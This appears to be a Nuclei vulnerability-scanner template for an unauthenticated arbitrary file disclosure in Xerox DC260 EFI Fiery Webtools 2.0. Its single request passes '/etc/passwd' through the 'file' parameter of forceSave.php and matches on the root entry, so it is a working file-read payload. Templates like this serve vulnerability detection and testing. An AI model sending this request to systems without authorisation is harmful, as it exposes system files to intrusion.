nuclei-templates/vulnerabilities/other/xerox-efi-lfi.yaml

29 lines
857 B
YAML

id: xerox-efi-lfi
info:
name: Xerox DC260 EFI Fiery Controller Webtools 2.0 - Arbitrary File Disclosure
author: gy741
severity: high
description: Input passed thru the 'file' GET parameter in 'forceSave.php' script is not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary
files on the affected system.
reference:
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5447.php
- https://packetstormsecurity.com/files/145570
- https://www.exploit-db.com/exploits/43398/
tags: iot,xerox,disclosure,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wt3/forceSave.php?file=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200